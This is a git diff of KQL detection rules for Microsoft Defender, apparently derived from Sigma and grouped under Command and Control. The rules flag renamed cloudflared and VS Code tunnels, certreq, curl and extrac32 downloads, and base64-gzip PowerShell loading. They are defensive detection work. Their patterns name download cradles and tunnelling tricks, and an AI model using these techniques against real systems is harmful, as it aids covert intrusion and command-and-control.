Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-12-20 +// Level: high +// Description: Detects the execution of a renamed "cloudflared" binary. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1090.001 + +DeviceProcessEvents | where ((ProcessCommandLine contains "-url" and ProcessCommandLine contains "tunnel") or ((ProcessCommandLine contains "-config " or ProcessCommandLine contains "-connector-id ") and (ProcessCommandLine contains " tunnel " and ProcessCommandLine contains "cleanup ")) or (SHA256 startswith "2fb6c04c4f95fb8d158af94c137f90ac820716deaf88d8ebec956254e046cb29" or SHA256 startswith "b3d21940a10fdef5e415ad70331ce257c24fe3bcf7722262302e0421791f87e8" or SHA256 startswith "1fbd8362b2d2d2e6a5750ae3db69cd1815e6c1d31da48a98b796450971a8e039" or SHA256 startswith "0409c9b12f9d0eda86e461ed9bdabeefb00172b26322079681a0bdf48e68dc28" or SHA256 startswith "7cfb411d04bac42ef93d1f0c93c0a481e38c6f4612b97ae89d4702595988edc7" or SHA256 startswith "5b3c2d846ab162dc6bc595cce3a49de5731afde5d6060be7066d21b013a28373" or SHA256 startswith "ce95df7f69664c3df19b76028e115931919a71517b776da7b42d353e2ff4a670" or SHA256 startswith "1293525a19cfe3bc8296b62fbfe19f083632ed644a1c18c10b045a1d3030d81a" or SHA256 startswith "af2b9161cfcb654b16408cd6b098afe9d1fb61a037d18d7090a119d4c0c8e0f0" or SHA256 startswith "39ddceb56a15798826a5fc4892fa2b474c444bb4d7a8bf2fa95e41cab10fa7a1" or SHA256 startswith "ccd11f2328023a0e7929e845d5b6e7bc783fb4650d65faef3ae090239d4bbce2" or SHA256 startswith "b6e5c5d2567ae8c69cc012ebcae30e6c9b5359d64a58d17ba75ec89f8bce71ac" or SHA256 startswith "f813484ea441404f18caad96f28138e8aaf0cb256163c09c2ab8a3acab87f69f" or SHA256 startswith "fc4a0802ab9c7409b892ca00636bec61e2acfc911bccfdeb9978b8ab5a2f828d" or SHA256 startswith "083150724b49604c8765c1ba19541fa260b133be0acb0647fcd936d81f054499" or SHA256 startswith "44303d6572956f28a0f2e4b188934fb9874f2584f5c81fa431a463cfbf28083b" or SHA256 startswith "5d38c46032a58e28ae5f7d174d8761ec3d64d186677f3ec53af5f51afb9bfd2f" or SHA256 startswith "e1e70fa42059911bc6685fafef957f9a73fc66f214d0704a9b932683a5204032" or SHA256 startswith "c01356092a365b84f84f0e66870bd1a05ba3feb53cafd973fa5fea2534bee234" or SHA256 startswith "b3f9c06151e30ee43d39e788a79cd918a314f24e04fe87f3de8272a2057b624f" or SHA256 startswith "cd81b2792f0739f473c31c9cb7cf2313154bfa28b839975802b90e8790bb5058" or SHA256 startswith "9ec7e6c8e1bfd883663d8d9d62c9e4f9ae373b731407181e32491b27a7218a2c" or SHA256 startswith "c2cfd23fdc6c0e1b1ffa0e545cbe556f18d11b362b4a89ba0713f6ab01c4827f" or SHA256 startswith "53f8adbd76c0eb16f5e43cadde422474d8a06f9c8f959389c1930042ad8beaa5" or SHA256 startswith "648c8d2f8001c113d2986dd00b7bbd181593d462bef73522cee212c4f71f95b3" or SHA256 startswith "ae047e2095e46c3f9c518b2be67ec753f4f0aad23b261a361fcb6144dcdb63b4" or SHA256 startswith "3153d2baa462978dd22ab33d1c2274ecc88c200225d6a3327f98d5b752d08f5c" or SHA256 startswith "f49cde976e628012c9db73e1c8d76081944ecf2297cdafeb78bb13290da274c4" or SHA256 startswith "d2513e58bb03ccc83affde685c6ef987924c37ce6707d8e9857e2524b0d7e90f" or SHA256 startswith "bb67c7623ba92fe64ffd9816b8d5b3b1ea3013960a30bd4cf6e295b3eb5b1bad" or SHA256 startswith "b34b3c3a91e3165d1481f0b3ec23eab93a1cfba94345a6cbfe5b18ddbd48eac7" or SHA256 startswith "f7848034e010d55f15e474ca998f96391e320ff29b00cfcc4c5e536529703e75" or SHA256 startswith "b6fc9493778cbe3bfc062d73f5cc604bc0ff058bc5e5dc6aac87f3a4008b54b6" or SHA256 startswith "f5c5e962577e2293c4ad10603816dce7cc273585969615fbf4e4bfa9eaff1688" or SHA256 startswith "d14c52d9220b606f428a8fe9f7c108b0d6f14cf71e7384749e98e6a95962e68f" or SHA256 startswith "d3a0e1a79158f3985cd49607ebe0cdfcc49cb9af96b8f43aefd0cdfe2f22e663" or SHA256 startswith "2fbbfc8299537ff80cadf9d0e27c223fe0ccb9052bf9d8763ad717bbfa521c77" or SHA256 startswith "19074674c6fbdaa573b3081745e5e26144fdf7a086d14e0e220d1814f1f13078") or ((ProcessCommandLine contains "-config " or ProcessCommandLine contains "-credentials-contents " or ProcessCommandLine contains "-credentials-file " or ProcessCommandLine contains "-token ") and (ProcessCommandLine contains " tunnel " and ProcessCommandLine contains " run "))) and (not((FolderPath endswith "\\cloudflared.exe" or FolderPath endswith "\\cloudflared-windows-386.exe" or FolderPath endswith "\\cloudflared-windows-amd64.exe"))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/renamed_visual_studio_code_tunnel_execution.kql b/KQL/rules/Command and Control/renamed_visual_studio_code_tunnel_execution.kql index 7c2a00db..92202d6b 100644 --- a/KQL/rules/Command and Control/renamed_visual_studio_code_tunnel_execution.kql +++ b/KQL/rules/Command and Control/renamed_visual_studio_code_tunnel_execution.kql @@ -1,10 +1,10 @@ -// Title: Renamed Visual Studio Code Tunnel Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-09-28 -// Level: high -// Description: Detects renamed Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1071.001, attack.t1219 - -DeviceProcessEvents +// Title: Renamed Visual Studio Code Tunnel Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-09-28 +// Level: high +// Description: Detects renamed Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1071.001, attack.t1219 + +DeviceProcessEvents | where (((ProcessCommandLine endswith ".exe tunnel" and isnull(ProcessVersionInfoOriginalFileName)) or (ProcessCommandLine contains ".exe tunnel" and ProcessCommandLine contains "--accept-server-license-terms") or (ProcessCommandLine contains "tunnel " and ProcessCommandLine contains "service" and ProcessCommandLine contains "internal-run" and ProcessCommandLine contains "tunnel-service.log")) and (not((FolderPath endswith "\\code-tunnel.exe" or FolderPath endswith "\\code.exe")))) or (((ProcessCommandLine contains "/d /c " and ProcessCommandLine contains "\\servers\\Stable-" and ProcessCommandLine contains "code-server.cmd") and FolderPath endswith "\\cmd.exe" and InitiatingProcessCommandLine endswith " tunnel") and (not((InitiatingProcessFolderPath endswith "\\code-tunnel.exe" or InitiatingProcessFolderPath endswith "\\code.exe")))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/renamed_vscode_code_tunnel_execution_file_indicator.kql b/KQL/rules/Command and Control/renamed_vscode_code_tunnel_execution_file_indicator.kql index f1ca8a9d..1662a343 100644 --- a/KQL/rules/Command and Control/renamed_vscode_code_tunnel_execution_file_indicator.kql +++ b/KQL/rules/Command and Control/renamed_vscode_code_tunnel_execution_file_indicator.kql @@ -1,10 +1,10 @@ -// Title: Renamed VsCode Code Tunnel Execution - File Indicator -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-10-25 -// Level: high -// Description: Detects the creation of a file with the name "code_tunnel.json" which indicate execution and usage of VsCode tunneling utility by an "Image" or "Process" other than VsCode. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control - -DeviceFileEvents +// Title: Renamed VsCode Code Tunnel Execution - File Indicator +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-10-25 +// Level: high +// Description: Detects the creation of a file with the name "code_tunnel.json" which indicate execution and usage of VsCode tunneling utility by an "Image" or "Process" other than VsCode. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control + +DeviceFileEvents | where FolderPath endswith "\\code_tunnel.json" and (not((InitiatingProcessFolderPath endswith "\\code-tunnel.exe" or InitiatingProcessFolderPath endswith "\\code.exe"))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/replace_exe_usage.kql b/KQL/rules/Command and Control/replace_exe_usage.kql index 78089437..4a5b51be 100644 --- a/KQL/rules/Command and Control/replace_exe_usage.kql +++ b/KQL/rules/Command and Control/replace_exe_usage.kql @@ -1,10 +1,10 @@ -// Title: Replace.exe Usage -// Author: frack113 -// Date: 2022-03-06 -// Level: medium -// Description: Detects the use of Replace.exe which can be used to replace file with another file -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1105 - -DeviceProcessEvents +// Title: Replace.exe Usage +// Author: frack113 +// Date: 2022-03-06 +// Level: medium +// Description: Detects the use of Replace.exe which can be used to replace file with another file +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 + +DeviceProcessEvents | where FolderPath endswith "\\replace.exe" and (ProcessCommandLine contains "-a" or ProcessCommandLine contains "/a" or ProcessCommandLine contains "–a" or ProcessCommandLine contains "—a" or ProcessCommandLine contains "―a") \ No newline at end of file diff --git a/KQL/rules/Command and Control/screenconnect_temporary_installation_artefact.kql b/KQL/rules/Command and Control/screenconnect_temporary_installation_artefact.kql index 056b4f88..3510f5fa 100644 --- a/KQL/rules/Command and Control/screenconnect_temporary_installation_artefact.kql +++ b/KQL/rules/Command and Control/screenconnect_temporary_installation_artefact.kql @@ -1,14 +1,14 @@ -// Title: ScreenConnect Temporary Installation Artefact -// Author: frack113 -// Date: 2022-02-13 -// Level: medium -// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. -// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. -// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1219.002 -// False Positives: -// - Legitimate use - -DeviceFileEvents +// Title: ScreenConnect Temporary Installation Artefact +// Author: frack113 +// Date: 2022-02-13 +// Level: medium +// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. +// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. +// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Legitimate use + +DeviceFileEvents | where FolderPath contains "\\Bin\\ScreenConnect." \ No newline at end of file diff --git a/KQL/rules/Command and Control/suspicious_binary_writes_via_anydesk.kql b/KQL/rules/Command and Control/suspicious_binary_writes_via_anydesk.kql index 00da7605..a8b8ee3c 100644 --- a/KQL/rules/Command and Control/suspicious_binary_writes_via_anydesk.kql +++ b/KQL/rules/Command and Control/suspicious_binary_writes_via_anydesk.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Binary Writes Via AnyDesk -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-09-28 -// Level: high -// Description: Detects AnyDesk writing binary files to disk other than "gcapi.dll". -// According to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll, -// which is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details) -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1219.002 - -DeviceFileEvents +// Title: Suspicious Binary Writes Via AnyDesk +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-28 +// Level: high +// Description: Detects AnyDesk writing binary files to disk other than "gcapi.dll". +// According to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll, +// which is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details) +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 + +DeviceFileEvents | where ((InitiatingProcessFolderPath endswith "\\AnyDesk.exe" or InitiatingProcessFolderPath endswith "\\AnyDeskMSI.exe") and (FolderPath endswith ".dll" or FolderPath endswith ".exe")) and (not(FolderPath endswith "\\gcapi.dll")) \ No newline at end of file diff --git a/KQL/rules/Command and Control/suspicious_certreq_command_to_download.kql b/KQL/rules/Command and Control/suspicious_certreq_command_to_download.kql index 34ab42d8..28edfa39 100644 --- a/KQL/rules/Command and Control/suspicious_certreq_command_to_download.kql +++ b/KQL/rules/Command and Control/suspicious_certreq_command_to_download.kql @@ -1,14 +1,14 @@ -// Title: Suspicious CertReq Command to Download -// Author: Christian Burkard (Nextron Systems) -// Date: 2021-11-24 -// Level: high -// Description: Detects a suspicious CertReq execution downloading a file. -// This behavior is often used by attackers to download additional payloads or configuration files. -// Certreq is a built-in Windows utility used to request and retrieve certificates from a certification authority (CA). However, it can be abused by threat actors for malicious purposes. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1105 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Suspicious CertReq Command to Download +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-11-24 +// Level: high +// Description: Detects a suspicious CertReq execution downloading a file. +// This behavior is often used by attackers to download additional payloads or configuration files. +// Certreq is a built-in Windows utility used to request and retrieve certificates from a certification authority (CA). However, it can be abused by threat actors for malicious purposes. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "-config" or ProcessCommandLine contains "/config" or ProcessCommandLine contains "–config" or ProcessCommandLine contains "—config" or ProcessCommandLine contains "―config") and (ProcessCommandLine contains "-Post" or ProcessCommandLine contains "/Post" or ProcessCommandLine contains "–Post" or ProcessCommandLine contains "—Post" or ProcessCommandLine contains "―Post") and ProcessCommandLine contains "http" and (FolderPath endswith "\\certreq.exe" or ProcessVersionInfoOriginalFileName =~ "CertReq.exe") \ No newline at end of file diff --git a/KQL/rules/Command and Control/suspicious_child_process_of_manage_engine_servicedesk.kql b/KQL/rules/Command and Control/suspicious_child_process_of_manage_engine_servicedesk.kql index bad8158b..56caf330 100644 --- a/KQL/rules/Command and Control/suspicious_child_process_of_manage_engine_servicedesk.kql +++ b/KQL/rules/Command and Control/suspicious_child_process_of_manage_engine_servicedesk.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Child Process Of Manage Engine ServiceDesk -// Author: Florian Roth (Nextron Systems) -// Date: 2023-01-18 -// Level: high -// Description: Detects suspicious child processes of the "Manage Engine ServiceDesk Plus" Java web service -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1102 -// False Positives: -// - Legitimate sub processes started by Manage Engine ServiceDesk Pro - -DeviceProcessEvents +// Title: Suspicious Child Process Of Manage Engine ServiceDesk +// Author: Florian Roth (Nextron Systems) +// Date: 2023-01-18 +// Level: high +// Description: Detects suspicious child processes of the "Manage Engine ServiceDesk Plus" Java web service +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1102 +// False Positives: +// - Legitimate sub processes started by Manage Engine ServiceDesk Pro + +DeviceProcessEvents | where ((FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\calc.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\query.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and (InitiatingProcessFolderPath contains "\\ManageEngine\\ServiceDesk\\" and InitiatingProcessFolderPath contains "\\java.exe")) and (not((ProcessCommandLine contains " stop" and (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe")))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/suspicious_curl_change_user_agents_linux.kql b/KQL/rules/Command and Control/suspicious_curl_change_user_agents_linux.kql index 6cc4fb27..9cb0a989 100644 --- a/KQL/rules/Command and Control/suspicious_curl_change_user_agents_linux.kql +++ b/KQL/rules/Command and Control/suspicious_curl_change_user_agents_linux.kql @@ -1,13 +1,13 @@ -// Title: Suspicious Curl Change User Agents - Linux -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-09-15 -// Level: medium -// Description: Detects a suspicious curl process start on linux with set useragent options -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1071.001 -// False Positives: -// - Scripts created by developers and admins -// - Administrative activity - -DeviceProcessEvents +// Title: Suspicious Curl Change User Agents - Linux +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-15 +// Level: medium +// Description: Detects a suspicious curl process start on linux with set useragent options +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1071.001 +// False Positives: +// - Scripts created by developers and admins +// - Administrative activity + +DeviceProcessEvents | where (ProcessCommandLine contains " -A " or ProcessCommandLine contains " --user-agent ") and FolderPath endswith "/curl" \ No newline at end of file diff --git a/KQL/rules/Command and Control/suspicious_curl_exe_download.kql b/KQL/rules/Command and Control/suspicious_curl_exe_download.kql index c2c540d7..de61ac2f 100644 --- a/KQL/rules/Command and Control/suspicious_curl_exe_download.kql +++ b/KQL/rules/Command and Control/suspicious_curl_exe_download.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Curl.EXE Download -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2020-07-03 -// Level: high -// Description: Detects a suspicious curl process start on Windows and outputs the requested document to a local file -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1105 - -DeviceProcessEvents +// Title: Suspicious Curl.EXE Download +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2020-07-03 +// Level: high +// Description: Detects a suspicious curl process start on Windows and outputs the requested document to a local file +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 + +DeviceProcessEvents | where (FolderPath endswith "\\curl.exe" or ProcessVersionInfoProductName =~ "The curl executable") and ((ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".gif" or ProcessCommandLine endswith ".jpeg" or ProcessCommandLine endswith ".jpg" or ProcessCommandLine endswith ".png" or ProcessCommandLine endswith ".temp" or ProcessCommandLine endswith ".tmp" or ProcessCommandLine endswith ".txt" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbs") or (ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%Public%" or ProcessCommandLine contains "%Temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "\\AppData\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Temp\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "C:\\PerfLogs\\" or ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\")) and (not(((ProcessCommandLine contains "--silent --show-error --output " and ProcessCommandLine contains "gfw-httpget-" and ProcessCommandLine contains "AppData") and FolderPath =~ "C:\\Program Files\\Git\\mingw64\\bin\\curl.exe" and InitiatingProcessFolderPath =~ "C:\\Program Files\\Git\\usr\\bin\\sh.exe"))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/suspicious_desktopimgdownldr_command.kql b/KQL/rules/Command and Control/suspicious_desktopimgdownldr_command.kql index 412c5335..c8977ed0 100644 --- a/KQL/rules/Command and Control/suspicious_desktopimgdownldr_command.kql +++ b/KQL/rules/Command and Control/suspicious_desktopimgdownldr_command.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Desktopimgdownldr Command -// Author: Florian Roth (Nextron Systems) -// Date: 2020-07-03 -// Level: high -// Description: Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1105 -// False Positives: -// - False positives depend on scripts and administrative tools used in the monitored environment - -DeviceProcessEvents +// Title: Suspicious Desktopimgdownldr Command +// Author: Florian Roth (Nextron Systems) +// Date: 2020-07-03 +// Level: high +// Description: Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 +// False Positives: +// - False positives depend on scripts and administrative tools used in the monitored environment + +DeviceProcessEvents | where (ProcessCommandLine contains " /lockscreenurl:" and (not((ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".png")))) or (ProcessCommandLine contains "reg delete" and ProcessCommandLine contains "\\PersonalizationCSP") \ No newline at end of file diff --git a/KQL/rules/Command and Control/suspicious_desktopimgdownldr_target_file.kql b/KQL/rules/Command and Control/suspicious_desktopimgdownldr_target_file.kql index 819ffe34..eab18902 100644 --- a/KQL/rules/Command and Control/suspicious_desktopimgdownldr_target_file.kql +++ b/KQL/rules/Command and Control/suspicious_desktopimgdownldr_target_file.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Desktopimgdownldr Target File -// Author: Florian Roth (Nextron Systems) -// Date: 2020-07-03 -// Level: high -// Description: Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1105 -// False Positives: -// - False positives depend on scripts and administrative tools used in the monitored environment - -DeviceFileEvents +// Title: Suspicious Desktopimgdownldr Target File +// Author: Florian Roth (Nextron Systems) +// Date: 2020-07-03 +// Level: high +// Description: Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 +// False Positives: +// - False positives depend on scripts and administrative tools used in the monitored environment + +DeviceFileEvents | where (InitiatingProcessFolderPath endswith "\\svchost.exe" and FolderPath contains "\\Personalization\\LockScreenImage\\") and (not(FolderPath contains "C:\\Windows\\")) and (not((FolderPath contains ".jpg" or FolderPath contains ".jpeg" or FolderPath contains ".png"))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/suspicious_diantz_download_and_compress_into_a_cab_file.kql b/KQL/rules/Command and Control/suspicious_diantz_download_and_compress_into_a_cab_file.kql index 5e9fd847..a5e27b99 100644 --- a/KQL/rules/Command and Control/suspicious_diantz_download_and_compress_into_a_cab_file.kql +++ b/KQL/rules/Command and Control/suspicious_diantz_download_and_compress_into_a_cab_file.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Diantz Download and Compress Into a CAB File -// Author: frack113 -// Date: 2021-11-26 -// Level: medium -// Description: Download and compress a remote file and store it in a cab file on local machine. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1105 - -DeviceProcessEvents +// Title: Suspicious Diantz Download and Compress Into a CAB File +// Author: frack113 +// Date: 2021-11-26 +// Level: medium +// Description: Download and compress a remote file and store it in a cab file on local machine. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 + +DeviceProcessEvents | where ProcessCommandLine contains "diantz.exe" and ProcessCommandLine contains " \\\\" and ProcessCommandLine contains ".cab" \ No newline at end of file diff --git a/KQL/rules/Command and Control/suspicious_download_from_office_domain.kql b/KQL/rules/Command and Control/suspicious_download_from_office_domain.kql index 1b0969d9..eae00681 100644 --- a/KQL/rules/Command and Control/suspicious_download_from_office_domain.kql +++ b/KQL/rules/Command and Control/suspicious_download_from_office_domain.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Download from Office Domain -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2021-12-27 -// Level: high -// Description: Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.resource-development, attack.t1105, attack.t1608 -// False Positives: -// - Scripts or tools that download attachments from these domains (OneNote, Outlook 365) - -DeviceProcessEvents +// Title: Suspicious Download from Office Domain +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-12-27 +// Level: high +// Description: Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.resource-development, attack.t1105, attack.t1608 +// False Positives: +// - Scripts or tools that download attachments from these domains (OneNote, Outlook 365) + +DeviceProcessEvents | where (ProcessCommandLine contains "https://attachment.outlook.live.net/owa/" or ProcessCommandLine contains "https://onenoteonlinesync.onenote.com/onenoteonlinesync/") and ((FolderPath endswith "\\curl.exe" or FolderPath endswith "\\wget.exe") or (ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "curl " or ProcessCommandLine contains "wget " or ProcessCommandLine contains "Start-BitsTransfer" or ProcessCommandLine contains ".DownloadFile(" or ProcessCommandLine contains ".DownloadString(")) \ No newline at end of file diff --git a/KQL/rules/Command and Control/suspicious_dropbox_api_usage.kql b/KQL/rules/Command and Control/suspicious_dropbox_api_usage.kql index 9f87de9e..06615ead 100644 --- a/KQL/rules/Command and Control/suspicious_dropbox_api_usage.kql +++ b/KQL/rules/Command and Control/suspicious_dropbox_api_usage.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Dropbox API Usage -// Author: Florian Roth (Nextron Systems) -// Date: 2022-04-20 -// Level: high -// Description: Detects an executable that isn't dropbox but communicates with the Dropbox API -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.exfiltration, attack.t1105, attack.t1567.002 -// False Positives: -// - Legitimate use of the API with a tool that the author wasn't aware of - -DeviceNetworkEvents +// Title: Suspicious Dropbox API Usage +// Author: Florian Roth (Nextron Systems) +// Date: 2022-04-20 +// Level: high +// Description: Detects an executable that isn't dropbox but communicates with the Dropbox API +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.exfiltration, attack.t1105, attack.t1567.002 +// False Positives: +// - Legitimate use of the API with a tool that the author wasn't aware of + +DeviceNetworkEvents | where (RemoteUrl endswith "api.dropboxapi.com" or RemoteUrl endswith "content.dropboxapi.com") and (not(InitiatingProcessFolderPath contains "\\Dropbox")) \ No newline at end of file diff --git a/KQL/rules/Command and Control/suspicious_extrac32_execution.kql b/KQL/rules/Command and Control/suspicious_extrac32_execution.kql index 5a108eba..4c2c37b6 100644 --- a/KQL/rules/Command and Control/suspicious_extrac32_execution.kql +++ b/KQL/rules/Command and Control/suspicious_extrac32_execution.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Extrac32 Execution -// Author: frack113 -// Date: 2021-11-26 -// Level: medium -// Description: Download or Copy file with Extrac32 -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1105 - -DeviceProcessEvents +// Title: Suspicious Extrac32 Execution +// Author: frack113 +// Date: 2021-11-26 +// Level: medium +// Description: Download or Copy file with Extrac32 +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 + +DeviceProcessEvents | where ProcessCommandLine contains ".cab" and (ProcessCommandLine contains "extrac32.exe" or FolderPath endswith "\\extrac32.exe" or ProcessVersionInfoOriginalFileName =~ "extrac32.exe") and (ProcessCommandLine contains "/C" or ProcessCommandLine contains "/Y" or ProcessCommandLine contains " \\\\") \ No newline at end of file diff --git a/KQL/rules/Command and Control/suspicious_frombase64string_usage_on_gzip_archive_process_creation.kql b/KQL/rules/Command and Control/suspicious_frombase64string_usage_on_gzip_archive_process_creation.kql index 675095d1..5f086383 100644 --- a/KQL/rules/Command and Control/suspicious_frombase64string_usage_on_gzip_archive_process_creation.kql +++ b/KQL/rules/Command and Control/suspicious_frombase64string_usage_on_gzip_archive_process_creation.kql @@ -1,12 +1,12 @@ -// Title: Suspicious FromBase64String Usage On Gzip Archive - Process Creation -// Author: frack113 -// Date: 2022-12-23 -// Level: medium -// Description: Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1132.001 -// False Positives: -// - Legitimate administrative script - -DeviceProcessEvents +// Title: Suspicious FromBase64String Usage On Gzip Archive - Process Creation +// Author: frack113 +// Date: 2022-12-23 +// Level: medium +// Description: Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1132.001 +// False Positives: +// - Legitimate administrative script + +DeviceProcessEvents | where ProcessCommandLine contains "FromBase64String" and ProcessCommandLine contains "MemoryStream" and ProcessCommandLine contains "H4sI" \ No newline at end of file diff --git a/KQL/rules/Command and Control/suspicious_invoke_webrequest_execution.kql b/KQL/rules/Command and Control/suspicious_invoke_webrequest_execution.kql index d94a68cc..6fb90d3f 100644 --- a/KQL/rules/Command and Control/suspicious_invoke_webrequest_execution.kql +++ b/KQL/rules/Command and Control/suspicious_invoke_webrequest_execution.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Invoke-WebRequest Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-02 -// Level: high -// Description: Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1105 - -DeviceProcessEvents +// Title: Suspicious Invoke-WebRequest 